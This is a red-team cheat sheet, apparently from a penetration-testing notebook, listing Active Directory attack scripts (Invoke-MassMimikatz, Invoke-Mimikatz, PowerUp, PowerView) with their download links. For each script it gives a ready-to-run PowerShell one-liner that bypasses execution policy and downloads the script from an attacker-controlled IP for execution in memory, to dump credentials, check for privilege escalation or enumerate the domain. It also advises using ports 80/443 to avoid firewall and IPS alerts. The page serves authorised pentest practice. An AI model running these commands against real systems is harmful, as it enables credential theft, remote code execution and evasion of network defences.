
# Important Scripts & Links

These are some of the important scripts that may be useful to a Red Team while exploring a network with Active Directory. There is significant overlap with the previous section; the difference is that this is simply a list of scripts along with their usage and commands (where required), whereas the previous section is organized by need/requirement and the script or command best suited to it.

Each tool's heading gives the gist of its use, and each section contains two parts:

* Link to download the script
* Command to download the script locally and execute it from memory

I have followed the method of downloading the scripts to a local repo and then using them in the PowerShell command to download and execute, since the targeted machines may not have internet access.

I have also used 443 in the http link since I use either 80/443 for all such activities to avoid any alarms the firewall/IPS may raise. You can change it to the port from which you host the scripts.

## Scripts

<details>

<summary>Invoke-MassMimikatz.ps1 # Dump Credentials on remote host</summary>

<https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1>

```
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.121:443/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
```

</details>

<details>

<summary>Invoke-Mimikatz.ps1 # Dump Credentials from Memory</summary>

<https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1>

```
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.208:443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
```

</details>

<details>

<summary>PowerUp.ps1 # Privilege Escalation Checks</summary>

<https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1>

```
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.208:443/PowerUp.ps1');Invoke-AllChecks"
```

</details>

<details>

<summary>PowerView.ps1 # Network & AD Exploration</summary>

<https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1>

```
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.208:443/powerview.ps1')"
```

Read more about the commands:

<https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon>

</details>

## Links

<https://wadcoms.github.io/#+Exploitation+Windows+No%20Creds+SMB>

<https://github.com/brianlam38/OSCP-2022/blob/main/cheatsheet-active-directory.md#AD-Lateral-Movement-1>

<https://gist.github.com/ssstonebraker/a1964b2f20acc8edb239409b6c4906ce>


